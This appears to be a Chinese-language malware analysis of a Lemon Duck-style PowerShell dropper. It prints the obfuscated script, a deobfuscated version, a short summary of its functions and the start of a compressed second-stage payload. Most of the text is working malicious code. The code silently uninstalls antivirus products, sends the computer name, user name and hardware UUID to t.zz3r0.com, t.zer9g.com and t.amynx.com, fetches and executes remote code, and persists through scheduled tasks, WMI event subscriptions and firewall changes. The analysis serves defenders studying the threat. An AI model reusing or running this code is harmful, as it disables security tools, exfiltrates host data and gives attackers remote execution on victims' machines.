CdJtmps=uOsfunction a(CdJu){CdJd=(Nefvpw'+'-Objfvp'+'ect Net.WebCfvplient).cFwDownloadDatacFw(CdJu)'+';Cd'+'Jc=CdJd.count;if(C'+'dJc -gt 173){Cd'+'Jb=CdJd[173..CdJc];CdJp=NtfU+tfUew-Object Security.Cryptography.tfU+tfURSAParameters;CdtfU+tfUJtfU+'+'tfUp.Modulus='+'[cotfU+tfUnvert]::FrotfU+tfUmBase64String(u'+'OsuOs2mWo17uX'+'vG1B'+'Xpm'+'dgv8v/3NTmnNubHtV6'+'2fWrk4jPtfU'+'+tfUF'+'I9wM3NN2tfU+tfUvzTzticIYHlm7K3r'+'2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv'+'1j1feIY6R7rpfqOLdHa10=uOstfU+tfUuOs);CdJp.ExpotfU+tfUnent=0x01,0x00tfU+'+'tfU,0x01;CdJr=New-Object Secu'+'rity.Cryptography.RSACryptoServiceProtfU+tfUvider;CdJr.Im'+'portParameters(Cd'+'JptfU+tfU);if(CdJtfU+tfUr.veri'+'fyData'+'(CdJb,(New-O'+'bject Security.Cryptography.SHA1'+'CryptoSetfU+tfUrtfU+tfUviceProvider)tfU+tfU,'+'[convert]::FromBase64String(-jtfU+tfUoin([char[]]Cd'+'Jd[0..171tfU+tfU]))))tfU+tfU{Ifvpex(-join'+'[char[]]CdJb)}}}CdJurl=utfU+tfUOsuOshttp://uOsuOstfU+tfU+uOsuOsU1uOsuOs+uOsuOsU2uOsuOs;a(CdJurl+uOsuOs/a.jspuOs+CdJvtfU+tfU+uOs?uOsuOs+(@(CdJenv:COMPtfU+tfU'+'UTERNAME,CdJenv:USERNAME,(get-wmiobject Win32tfU+tfU_ComputerSystemProd'+'uct).UUID,(random))-joinuOsuOs*'+'uOsuOs))uOs
CdJsa=([SecuritfU+tfUty'+'.Principal.WindowsPrincipal][Security.Principal.W'+'indowsIdentity]::GetCurrent()).IsInRole([Se'+'ctfU+tfUurity.Princitf'+'U+tfUpaltfU+tfU.WtfU+t'+'fU'+'indowsBuiltfU+tfUtInRole] cFw'+'A'+'dministratorcFw)
funct'+'ion getRan(tfU+tfU){return -join([char[]](48..57+65tfU+tfU..90+97..122)T'+'jQGet-Random -Count (6+(Get-Random'+')%6))}
CdJus=@(uOst.zz3r0.tfU+tfUcotfU+tfUmuOs,uOst.zer9g.comuOs,uOst.amynx.c'+'omuOs)
tfU+tfU
CdJstsrv = New-Object -ComObject Schedule.Service
tfU+tf'+'U
CdJ'+'stsrv.Connect()
try{
CdJdo'+'it=CdJstsrv.Ge'+'tFolder(cFw9RTcFw).GetTask(ctfU'+'+tfUFwblackballctfU'+'+tfU'+'Fw'+')
}catch{}
if(-not CdJdoit){
if(CdJsa){
schtasks'+' /c'+'reate /ru system /sc MINUTE /mo 120tfU+tfU /tn blackball /F /tr c'+'Fwb'+'lackballcFw
} else {
schtasks /create /tfU+tfUsc MINUTE /tfU+tfUmo 120 /tn '+'blackball /F /tr cF'+'wblackballcFw
}
foreach(CdJu in CdJus){
CdJi = [array]::IndexOf(CtfU+tfUdJus,CdJu)
if(CdJi%3 -eq 0){CdJtn'+'f=uOsu'+'tfU+tfUOs}
if(CdJt'+'fU+tfUi%3 -eq 1){CdJtnf=getRan}
if'+'(CdJi%3tfU+tfU -eq 2){if(CdJsa){CdJtnf=uOsMictfU'+'+tfUroSoft9R'+'TWindows9RTuOs+(getRan)}else{CdJtnf=gettf'+'U'+'+t'+'fURan}}
CdJtn = getRan
if(CdJsa){
schtatfU'+'+tfUsks /create /ru system /sc MINUTE /mo 60 /tn cFwCdJtnf9RTCdJtncFw /F /tr cFwpowershell -w hidden -c PS_CMDcFw
} else {
schtasks /creat'+'et'+'fU+tfU /sc '+'MINUTE /mo 60 /tn cFwCdJtnf9RTCdJtncFw /F /tr cFwpowershell -w hidden -c PS_CMDcFw
}
'+'
'+' start-sleep 1
CdJfolder=CdJstsrv.GetFolder(cFw9RTCdtfU+tfUJtnfcFw)
CdJtaskitem=CdJfolder.GetTasks(1tfU+tfU)
foreatfU+tfUch(CdJtfU+tfUtask in CdJtaskitem'+'){
foreach (CdJatfU+tfUction in CdJtask.DefitfU+tfUnition.Ac'+'tions) {
try{
if(CdJaction.ArgumtfU+tfUents.C'+'ontains'+'(cFwPS'+'_CMDcFw)){
C'+'dJfolder.RegisterTask(CdJtask.Name, CdJtask.Xml.replace(cFwPS_CMDcFw,CdJtmps.replace(u'+'OsU1uOs,CdJu.substring(0,5t'+'fU+tfU)).replace(uOsU2uOs,CdJu.substring'+'(5))), 4, '+'CdJnull, CdJnull, 0, CdtfU'+'+tfUJnull)TjQout-null
'+' }
}catch{}
}tfU+tfU
}
start-tf'+'U+tfUsleep 1
schtasks /run /tn cFwCdJtnf9RTCdJtncFw'+'
stfU+tfUt'+'art-sleetf'+'U+'+'tfUp 5
}'+'
}
try{
CdJdoit1=Get-WMIObject -Class __EventFilter -tfU+tfUNameSpace uOsroot9RTsubscriptiotfU+tfUnuOs -filter cFwName=tfU+tf'+'UuOsblackballuOscFw
}catch{}'+'
if(-not '+'CdJdoit1){
Set-WmiInstance -Class __EventFilter -NameSpace ctfU+tfUFwroot9R'+'TsubscrtfU+tfUiptioncFw -ArgumtfU+tfUents @{Name='+'cFwblackballcFw;EventNameSpace=cFwroot9RTctfU+tfUimv2cFw;QueryLangua'+'ge=cFwWQLcFw;Query=cF'+'wSELECT * FROM __InstanceModi'+'ficationEvent WITHIN '+'3600 WHERE TargetInstance ISA uOsWin32_PerfFormattedData_PerfOS_StfU+tfUystemuOscFw;} -ErrorAction Stop
tfU+tfUforeach(CdJu in CdJus){tf'+'U+tf'+'U
'+' CdJtheName=get'+'Ran
'+' CdJwmicmd=CdJtmps.replace(uOsU1uOs,CdJu.subs'+'tring('+'0,5)).replace(uOsU2uOstfU+tfU,CdJu.'+'substring(5)).replace(uOsa.jspuOs,uOsaa.jspuOs)
'+' Set-WmiInstance -Class __FilterToConsumerBinding -Namespace'+' cFwrtfU+tfUoot9t'+'fU+tfU'+'RTsubscriptioncFwtfU+tfU -Arguments @{Filter=(Set-WmiInstance -Class __Eve'+'ntFilter -NameSpace cFwroot9RTsubscri'+'ptioncFw'+' -Argument'+'s @{Name=cFwfcFw+CdJtheName;EventNameSpace=c'+'Fwroot9tfU+tfURTcimv2cFw;QueryLanguage=cFwWQLcFw;Query=c'+'FwSELECT * FROM __InstanceModificatfU+tfUtiotfU+t'+'fUnEvent WITHIN 3600 WHERE tfU+'+'tfUTargetIn'+'stantfU+tfUce ISA uOsWin32_PerfFormat'+'tedDatatfU+tfU_PertfU+tfUfOS_SystemuOscFw;} -ErrorAt'+'fU+tfUctio'+'n Stop);Consu'+'mer=(Set-WmiInstance -Class CotfU+tfU'+'mmandLineEventConsume'+'r '+'-NamespactfU+tfUe cFwrotfU+tfUot9RTsubscriptioncFw -Arguments @{Name=cFwcc'+'Fw+CdJtheN'+'am'+'e;ExecutablePath=cFwc:9RTwindows9RTsystem329RTcmd.execFw;CommandLineTe'+'mplate=cFw/c power'+'shell -w hidden -c '+'CdJw'+'micmdcFtfU+'+'tfU'+'w})}
start'+'-sleep 5
'+' '+' '+'}
tfU+tfU
cmd'+'.exe /c netsh.exe firewall add portopening tcp'+' 65529 SDNSd
netsh.exe intertfU+tfUface tfU+tfUptfU+tfUortproxy add v4tov4 listenport=65529 ctfU+tfUonnectaddress=1.1.1.1 connectport=53
netsh advfirewtfU+tfUall firewall ad'+'d rule name=ctfU+tfUFwde'+'ny4'+'45cFw dir=in protocol='+'tcp tfU+tfUlocalport=445 action=block
netsh advfirewall firewall add rule tfU+tf'+'Uname=cFwdeny135c'+'tfU+tfUF'+'w dir=in protocol='+'t'+'cp lo'+'calport=135 ac'+'tion=block
Set-ItemProperty -Path cFwHKLM:9RTSYSTEM9RTCurrentControlSet9RTServices9RTLanmanServer9RTParame'+'ter'+'scFw DisableCompression -Type tfU+'+'tfUDWORD -Valu'+'e 1 ???Force
}
schtasks /delete /tfU+tfUtn Rtsa2 /F
'+'
schtasks /deletfU+tfUte /tn Rtsa1 /F
schtasks /delete /tn Rtsa /FtfU)-cREplaCe ([CHaR]1'+'02+[CHaR]118+[CHaR]11'+'2),[CHaR]96 -RepLaCE tfU9RTtfU,[CH'+'aR]92 '+'-cREplaCetfUCdJtfU,[CHaR]36-RepLaCEtfUTjQtfU,[CHa'+'R]124 -cREplaCe'+' ([CHaR]117+[CHaR]7'+'9+[CHaR]115),[CHa'+'R]39-R'+'epLaCE([CHa'+'R]99+[C'+'HaR]70+[CHaR]119),[CHaR]34) )'+'
') -ReplaCE 'tfU',[CHaR]39 -ReplaCE 'hCN',[CHaR]36)| &( $pShOMe[21]+$PSHOme[34]+'x')" = lh2$
继续处理混淆后如下
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
$v="?$v"+(Get-Date -Format '_yyyyMMdd')
$tmps='function a($u){$d=(New-Object Net.WebClient)."DownloadData"($u);
$c=$d.count;
if($c -gt 173){$b=$d[173..$c];
$p=New-Object Security.Cryptography.RSAParameters;
$p.Modulus=[convert]::FromBase64String(''2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10='');
$p.Exponent=0x01,0x00,0x01;
$r=New-Object Security.Cryptography.RSACryptoServiceProvider;
$r.ImportParameters($p);
if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){Iex(-join[char[]]$b)}}}$url=uOs'http://''+''U1''U2'';
a($url+''/a.jsp'+$v+'?''+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join''*''))'
$sa=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
function getRan(){return -join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6))}
$us=@('t.zz3r0.com','t.zer9g.com','t.amynx.com')
$stsrv = New-Object -ComObject Schedule.Service
$stsrv.Connect()
try{
$doit=$stsrv.GetFolder("\").GetTask("blackball")
}catch{}
if(-not $doit){
if($sa){
schtasks /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
} else {
schtasks /create /sc MINUTE /mo 120 /tn blackball /F /tr "blackball"
}
foreach($u in $us){
$i = [array]::IndexOf(CdJus,$u)
if($i%3 -eq 0){$tnf='uOs}
if($i%3 -eq 1){$tnf=getRan}
if($i%3 -eq 2){if($sa){$tnf='MicroSoft\Windows\'+(getRan)}else{$tnf=getRan}}
$tn = getRan
if($sa){
schtasks /create /ru system /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD"
} else {
schtasks /create /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD"
}
start-sleep 1
$folder=$stsrv.GetFolder("\$tnf")
$taskitem=$folder.GetTasks(1)
foreach($task in $taskitem){
foreach ($action in $task.Definition.Actions) {
try{
if($action.Arguments.Contains("PS_CMD")){
$folder.RegisterTask($task.Name, $task.Xml.replace("PS_CMD",$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5))), 4, $null, $null, 0, CdJnull)|out-null
}
}catch{}
}
}
start-sleep 1
schtasks /run /tn "$tnf\$tn"
start-sleep 5
}
}
try{
$doit1=Get-WMIObject -Class __EventFilter -NameSpace 'root\subscription' -filter "Name='blackball'"
}catch{}
if(-not $doit1){
Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="blackball";
EventNameSpace="root\cimv2";
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
} -ErrorAction Stop
foreach($u in $us){
$theName=getRan
$wmicmd=$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5)).replace('a.jsp','aa.jsp')
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=(Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="f"+$theName;
EventNameSpace="root\cimv2";
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
} -ErrorAction Stop);
Consumer=(Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name="c"+$theName;
ExecutablePath="c:\windows\system32\cmd.exe";
CommandLineTemplate="/c powershell -w hidden -c $wmicmd"})}
start-sleep 5
}
cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 ???Force
}
schtasks /delete /tn Rtsa2 /F
schtasks /delete /tn Rtsa1 /F
schtasks /delete /tn Rtsa /F
脚本主要功能
- 尝试卸载杀软(eset、卡巴斯基、avast、诺顿等)
- 依次尝试从
t.zz3r0.com
、t.zer9g.com
、t.amynx.com
下载a.jsp
后重命名为aa.jsp
- 检测权限是否为
administrator
,如果是则创建计划任务blackball
- 设置SMB为启用
- 防火墙添加转发、阻断规则
- 下载时判断返回长度是否大于等于173,如果大于则解密前173个字符并用来做SHA1校验,如校验成功则执行下一阶段脚本
a.jsp 第二阶段攻击脚本
a.jsp为第二阶段攻击脚本
脚本在下载攻击文件时会携带UALemon-Duck-
oM/axl7kOfLq0gbJx+jFEsor6+Z66LcorosvJGnVxNCU34epX0b7EbBhZPTvwFOaF7grX+nwaPyA/6VCNiCkpsWL1J3yWm68X8f8KGhc+gPwGvgjJk8Y+twUiQGYsIT6Y7w9xpVVZspbOsF+tIWXiXtf+0pEdrsCOVnqU83dTtE=
I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f229ad337db3f99d567d993f2344db73efe89bdcf3ffee4e3fdf9c777e8aff4a33b1f7ffca2a87e7afbe3dffbe34fbe7f6fb4fbbd3bf9f4455e9f3ecbeb97a7afbf7c52e73ff9bb7dffe2c5d9ab37afbfb7452ffcc29f49ef7c7aeffbf5f1b7a7dfa3cf8b576f9aef8dee7c7a5f3ef9e4fe81feb2a39f6c6d9d4eb3e7abbc1edf79d87beddeeeae367ff8407fd9331f792f7efc331f8feeecec99b6bbf637fbbedff8374e7ee3e4ce2ffa72f57bd3ff3ff93e8df5deeef79e9e95cf4fe7cdc1577b9f7c7ff77b33feebf5017df7d51e8d69fcee9a7efd45773e7d28d046f4e64f7c55d3bfe9e9f4f8f94bfa32a7ffd7d3ed7d1d025a3c78fb05fdcb0d72fa6acf7b7976efdabe8cefd2d4908c486528b46f68f6e0531d447a7ac22f507b43abd19dfdfbd4b5b6fc545b2a99e98be0ad7d4398d19d5dd3cbfd1d43ac1dfa0da3d0ae0c6e20d52f01cd683ccb6232ce67d5ddb25efffecbab6af6939f9ed0a7e9ef7d7a462fbefe31b4fac577ee5c54e5f8eddbfdb76f6998ab45fb0874a6ff5f2e736a9fcedb6cb5dd3679bbf5bb6e9d17fa1ddee44e7ec98fc9bf3f667bd416937159640bfde3f73f2f0807eab38bc6eb1ffb318345fbae1def17bf881ac93b65b69855178a521417f32a75f445994dab929ae063c6e817cfa76d36fd25c197df3fcfebef8d3e7df295a265be7b4ebd94bfe84bea9a3fce2655f939b51ae5ebbafd49fa94c0becbdbf517e38b6531cbf27afe266da7f94f4fbedcbeca5f1ce64d466dca73eae033bfb75f7c5db78ae145569e2f7ef253ed1648328ebf8449789dbf6d82c17da6ed2e042ebd78c270667575f58bbee4af9ea6f9eabadd4ef7d2599dad3f2f6992bf10945205a730d26bfda5adf35555bf5c80f7dbb3ed367fad33e7a3b0c05734267dc7ce8d87e24ba0f846e84fb074daafdba2d697d6d3fc35d1f36d45df5665bbfe92fef8fde965fa8111d26f8f1e11659ae2227f456f7e6660d3c3bdcda744e1eafc278ad92fb9f3b68a4230742440faabc2f3104c67cb4cbfdc4ea99f4f66f43ab80e7cb1d84e01f01733c9aaedbccee757d461bec896db690f4b90a59895c57c4a64bb1092a0110d50db191a5373fd5570516695e9fec5771a059d2e0bd30bc1d8d211b39e230cab06333e5b5ed1bf8b7a2a03c7870afad393e6ed5c4468649bdfbaa1c06dde52c7bdef6cf3addff333c5d5905ae659fffa82fac9ebecaa3daf30d5a72fcebe7d724c1f42e94a0be8dfdf874ccc99fefdf9e92b6ab85cbfaadebc9d1625faf84c505606a26fc199b3eac5debdfd4fafaaefa285e0aa2df269717e0e56a05e9baa9e165f3ca037a895e0eee09cbe3afeee9b675f7a98fdfecf8f4fbe7cfefbff3ea7bfd7b7015686a9cceb148ea736046be80351722229fac66c2994f6f412cb4d7ea983ad16f92b119d3b9fee82badfa2d6fdb740e71c4a31fff6f5aa3a19df715f6de5d36cf59ad8f1c5f8ced2402d08b1a25cad8ec76599cf5fab0a5a5427db297d4d709805ad5eda52144014bf6f0567501899efef4248602808922ae92d90bd341afdd92cab4afae6297d3abed32ef3a224a37a32c9bf3ba6575a6d85f1bc006ef41d64eb8a7ee64b45e617df39f8f4e1fd7b3b7b7b69ce9276b1cc4b3703e33b178c8ad0b3cd3fdf4aeb8a47876fcd9756aef473d145bf71c2d343b8b5d96c7c31bb5ccee8830ebd3f1310c658ad8a1f8ca9a1b01a3e5788cc17f2eb2fbeb3ff6953a05b82462a653b5df29f46a64947e0a7806b7e7adcd615792d64ecf4fdf5ef4fa23d95ded9e0397e12564b030b4a3fa89f1ff310b84303bd9efcfe57594d40befffdefd5d97cfabd253c3c337c80fd3163475352d6595d1fd34b046842ef8c76b33914ecc807b495b5d9d3ebf3a2ce2fc75953cb801406b3e4acb8246b41327759e7afab76755d9fec6a87c7df7e3dbe9eaff4afacbe90afc7b00150fe639abde6fa3541b1565298e2b35451d18e88b4643b81e3d685e1f2a26e5ff3c74f1655fdecd1a3ef93ddba5c56d3efd1db9d81192832aee545d17814da6212d14bd28742f7df5a6475f652c7ded4799bf307983fe3b59c3169f40ffbe6611d23cef1eb57208a5243df891325870dce8c8d253bfe66db73270865414abbdbdd79b733dac13ff82dfd451f1b61f92c25115c56ab77a763190ba09a373d469edda777279fd23ffae183fd77fadbcee8c1843e3fb847ffe0ed9c7e3e7848ffe419de7940ffece3b77b78fbe000df9ed33ff767e6b319fedc43bb9d5d7cc1efeed13f9fe28bf37bef082a40d20f00a4f7b4e7d1019a663bd260320504609103ea43fc76ce9fcda4c1defebb1dfa65940387fb16c30cad771ffe22abfd8061c6afa0b5e96c1f3081e40c30f780e95e2e289d6b9387f2a690019d1cf0e07500f4cf03bcfa00046220bb3bf2fe1e88fb293eb9c75400e60fd1c12e6834012966f862622973008a4f81780e687bf8628fa9caa3e6f900025300d8e101e2b75d0015aa7aa322243e05d633bc96a35d065c988a9ff298c0389f029e2106b0d9c3f713ee8f2000d03d409e001c5e82e27453c503e67f76f837250a0f7d0a20f730ae1c6078563e051e0fb80b8cf03ef31fba9d2a7c468fe99501c77bf7cd9fe73cbe3dcb9e9844fe6c0f2398a1f1432624ded8dd173c6680360501987527fc9bcf69c0e93e1a197f90be24296bd6e59abc66111e82a4ba40c5ce698450b23b224def9154f7f49caf5c8cdaf87ebb5c57d3316b2b6af7fb3739be1d8fef3dd8fd9ea830f904af5b4dad187b5076313bbbe3f14eef2574ee6942ed5721fce23bd44fda5e90aa7168e8cb3694ba4320c80328b3658168868d048cfec7ec113c1db3cd9f4ef22b1f4d81a1e6cbda34817787a2a86d4452f4ffd93d45e59afe80835322bc7f3b5d3ffdfd97e4313dff18de3437f9182aeee413b298dbf85a5fdbe656eab1102617c7db758e417f05476a36cbc634673333c7f9b7195b0c481136161251997100789e6015e0fbd0ff7f0ffd49445093fd59ea1144de0b3c9fd67376be1467070ce053caeb9789c2ff4a0fdfa78092828ceff1475bcc34fc6b9afe625875478dd7e992fcbfe9726da3845ff800c136d938fcb13fde0161568b8cfca245d1c2dce3e70a9d18bd5fcfe1278f5605ffb8e47ff1b201f4fdfbe0aafbb345fd9623e9f8978b0ddf9d17f225a1dc160b0a3831c47679f6bdd122e7ee2858852f34ca2f8b1a0ee66849390276354734978cacba5bf25a537941f3efb985a9c1b83ffbc44e9cc775bf84d9ede198ff53a63b18f37fe0b8df738bd8a3fe723eadb3fc35391575ae905fbf7ef194c2e1f11d84fb9f11eeb3bc9c64cb7c55a4a404cae27c9b899fd5eb8be29c5c116a419fafb259f69602f2365ffefe7bf79605643f6d9aac9caa35af8ac515f9b0f4f1c5967313d9f5bb730791a608ee6475b1f5c91d4ad4d46ff127931fbfec532c045aa5e7d38badad94624bf5a0ebdfcbcb75009a6df9ee94d8ef4c59bbfebdc0bef8eae233d3c222404889db094ce80f830ca171e1e529d2cc78798a23be3c31fe38a12a7fdfeba32ab86ac33b17cb2fde741334f625c1da48a4e98fdea0bf4053198269ae44304e397be47732a801fe1be1823ae826c9c2ffd8c17a2365dcb3d505bd2ba3e30fc0e2f8b967d863606c77784cf46e38acbdceb014888e4e46a543324ddd9074143ee68cb302f139869ade59a2bd7e37392f047bfd7b217fef0e71d1f959878b4c4b178d85fc747ee630376d2d9686639e7c65659144ee13ce897d42bf515f1f231bf4935e0e4efe87361f23c3a6cdaae7399271948283eafe5c1a8dcc5c201fb73119a7ed0ec9e797845c170d9b99a33f03fb98b2f163b3c7830c14ae0c926c590a78e022854849a33b4ba645109a81a5e8ffbff7e94fc03e41619c5163849026cb7547816cd16cf6bb2252e7efa03ac6d40a38114d7e778a647ff7f417a6f445e7531dc2ef9e1675e57dc51ff36ccaabd777d13ffd9fb20dd3747a379d2da6bf30ddc6278a0c8de68102fb18a9954f308bbff0f7fbfd7e3fcc016689fef28df71d6dcc84708c33d337843eee05694dcd56f42a7d4c2207d6841bf1e4f4e576ba8ba0fef0ce1d4a6ca76650e4ac507e836cc4327b858c0008fe608ffc1f02b3bbb5f509672b18ce68c536668bc195e53186459eda771f3dfa3ee5309e8dbf3c83c3a660c969d3dfbe77e87891c81e9210ee80fbdaa5123e93be0eef6c5104569e8c0583cf7e7ffc3434a16f77e82134e8df5d418bf8f5957e3fbe73e74ed318c6ae578b6a9a3f05aee493123fd057f88c404310b495fbf4cb334af98feedcf9fe1d71e78407b7c6e33bbb9fb00af99e7ca22f8ec8b7e05453fbfabaae3807fc8512c4775f296994a261fb7a05cfe9079f8f7d4cb83d60d85714babc09e72b7f755d5b6d553ca1577cd89f09990eef7c1f2892cf60a64025c865e07d5922692735541cfe925ff296509bfce23b19c7c1f976ca60f465d262bff8ceee673cf8c3dd6d9f2a695b6ea7fcf9ce674c1bcab53ad9007baa4e542918e9fc6f916d8070f4a4139ac2138c9e5408dfff7ed48a1ae818ad00b144b8290d5ffb25bf3f999f8f39adfc19fb53c09afefefdbdd9a4c85ffea2cf7ff19dd5ba6235725efc925fb2fb99fef58bf3a6cc7f892aa6d18ac158b98808054de8f77ef11dd32191b6159087cc7c4c4318fbcff0f121f05481a02fd511fbd8a8f0df039f837cf4097f7057dbba25281d39d1577fa3849da616679dbc2279d71f4b1a2970b0b72214f85d3b24f08703aaea88424acab0f4ebc33b4a290c4b890596eed24adf7dfdbdcf1418e180389a0dae9ff4ff2508c3d265bd6ef3faf09728ddf6def14f6affd5167bffafab37632c4690530b586ef9e317d9b486cee4d6bcc9be4da68fa591544f4b2d69f9e1fbf79f7e311ca1cadc2a00e71e38a3e3e93f6f99d0a9bdcf10feb92fbce64b938a70d34f3a53bf5c818f455ff2b79f0971ddeb181bd35dba32f2f0a95d9d73120078ea72a0715acda7f9a74e6e595a470c6ba4cdb6ce63169cd4391109933245b63ba5f59ae7c46f8626eb8bfa783b857d25cbc84b4998f7edd4a9e929a5fd60dc8d19814acd5a594953c86d53cdb72163577645eb8e7cb5b5e27441809631294c220933c8452143d7e05bc159fb32111f457cd34ca229e3fcad2f78e8048454d7ef0f5382bf2fd1272de42ce0a5ba6889d6cb11bc21d4dd6a8b72d58c2516fdec521b901065ec42d3c21f357afac5f14f683fc56c599196c7b29d5946d388ce7adbbb9f2dbd774f4f5e7df9ec1446fbf8ece9d94fbea05f7eef379f6f78fd17cf0da5e144e22376d90db97f92adf2ce78f7d2f837b4888bc5903abfaa5e36c4a1cbe2bbf4d5de3d939b69e82ff9fc8a7e7b34c564621661d8d61f233bf0ee94e6dc2964283c72b47372535faebe3049f6d9ecd84c678eb453ce6b300dba5d0946f4219072d8e89b0629fd537113c4822611fc14391f1f4284b94d1a83476f6ab99b42cd546db1acbe404ea024959643a62734cb4f3b2f9965e15faca869dcea7bf5b0775b365d4f06baccdaaa1d9336aa493fcdc714f9829b24dbc03c5e8c99e5f3256921f3b56421f035f0c732847e71693ed71e38a827af62b1583777f5b3ddbb0f3ffdf4defea3ddf10efcc09d31798477ef3e5ab5ed1cc8117f495e45ac8abe54cde87334b72606f9193231cbde6a15de108ed8da12ff25ff415166b45ad2e44fc7776af3d7eb96d62ba60aff7576997d87476aec9a693536ea02ad5f8fc9b0051ed767703264f4ec5d109a8dbe00da2cf39652fcb086a2cd21b7581924d82de58be6add102dfa5e13e2773705d4e1679d31c2bd5cbf3fcd5f7784e7532ef3c1ced88e969266b4a7ba0bfdf9dd561069d5d57cf28cea1e97c2a2b709fa57e5ac9e7067a071183c943fd92efef7cefce9d6029a70163d00207f23d4fd9ca710ee7f7875f4dadcd14f342277f0bf307f1220b9812ecf497b01ad9bbf7e6f8193084d74758128a1e440efad1ecf5b3372fa415818834dcd27401da4aeac66fdec1d3424532e8527ce6570607afedc7ecad59d8fb7b3b92669515dcbc7e86f7cb22bb3c56b84613a0f935f91704e05573c65ffee29424717ec523bf430e1b7aa039a039adce9767d2a1f1429aef616a4c22cd9fdfc9e7bb774958348fc37c4cffac4e3e9324dce12f49c93f20ec32f84fdc6ffad9272906c82f9d50eef1972041ce301459c2ed7767b4103ee45f50205d34d7f3979cf9fa6e4a99ae0ba3ab019324a42cabba5d5627642f8a9fa4661f234c337c5f2cbe6b784b0d00b35543e6654aae6be602016816a68c738b38e239793b2dde105d489417cbaa2ec8867e6f8bde37b24e608ab22cbed045c465b66206fe1ec105d54c6a94f50f529024d542d59a231cb8585349eb0165851a626e52970e590677fac5f18b57a7afbfd248911a4a66d359184febfde4788214e7c927fa95910dcdae22d39daa0149dbf3aaa9eae92fb25e618126367c80b0d3942a4064e72bf12a58e4457590d09396ce575f826b65ea2863a97ddbc4a53f4881a66bebc4d84d5dc0d53529ce6de897bc61ce409c487efc34fb627ce79720950a347e82ac924da776785cfb9d05d9d51349ad1eab7c0a837d6c97923dd4c409c2e89e9e7df515050e535acea95fca486b76930d379cfcfe7bfaeb3dcb8495a4672f08947e97ce0a76a478ac6622df7cf5f28b2f4fdc64e69e8765b43519d78c745db12c16b3634c19c50bd5abe519e58ed74f74fac6a5f6c22955338353d2c22fc95da7bfc563ffde96bc4a0a81542971775daf4fa002a80569f6b6a08f66671666e640e8fbdfb79f51237a69a81d286873f4c6d3fc025eb1a4f4f790d2bfa31f057ea22c89fcfe248d5389f25876a9151165fc6e79bdc8c6ad1a63fad065853e2b6b2501a0fce23b044474e7efaace9f930140ba58be9d66e39983e4e6c90b5304737f09804720c974f29102ffda75b0650c6c34cc23e2705c6897428c66edf6b2083a91d198041a3ab909fa22025c5fb77d7004e48de4d313c67f1034e65ca0633546a1492ffa87ceb5ea17f703efd0db32e491416fa49084d660ff9aa4e6339b4967d4f52bed80650532bbb433de5a17deb8d1e018845ace8f060a0c96d983864f20b00280cfcc74092d1064a36f6ea25f7de185dee028d34f59ae97dbedba124f45c1f97074da88c17a18055d7d91926a29b63979aab0f505c134fd843c0bf0d9ef7ec7a52bb73ef9748b575cbd242670e03ce61ef2980f1e7eb2f3703cbeffe9270f6819ed607fcb2492b758102d452cddbc5f8c40a4e633db58920ea9f7b0877047531decc4d0afd0d10a844816804be195b2866327c8271a7da10b432cdc4a9e2d1b25f758939a09776a032feb020512a2d8b84114a9f97d4bedbf692648e964118cce7cb1b8fb72a21d472591141a93c2ca8aa5307a17a3a5dfd9e8d438231ebfe8575807ac56b4506262326a411f7d4b3e599e6da758c07ffbc5b73acc554c81881dfcc7bc5460b88ce2cb9f4470893ee8ff96413b11afc